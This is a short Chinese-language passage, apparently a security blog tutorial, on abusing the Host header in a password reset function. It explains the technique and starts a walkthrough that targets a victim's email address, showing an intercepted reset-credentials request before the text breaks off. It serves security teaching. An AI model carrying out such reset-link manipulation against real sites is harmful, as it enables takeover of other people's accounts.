未经许可,不得转载。
文章目录
在 HTTP 请求中,Host
头用于指定目标服务器的域名。当用户发出请求时,服务器通常会使用 Host
头来决定请求的处理方式,例如生成重置密码链接时,服务器需要知道应该发送到哪个域名。
正文
首先,在忘记密码功能中输入受害者的邮箱地址,并拦截请求:
POST /auth/realms/example/login-actions/reset-credentials?session_code=AbcdiQqKwDBsJcdIjZpAFW3&client_id=account&tab_id=Abcdii7y9i3qwXs HTTP/1.1
Host: login.example.com
Cookie: AUTH_SESSION_ID=fc59cdd34026abcd; KC_RESTART=AbcdiSldUIiiaXNFs
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-w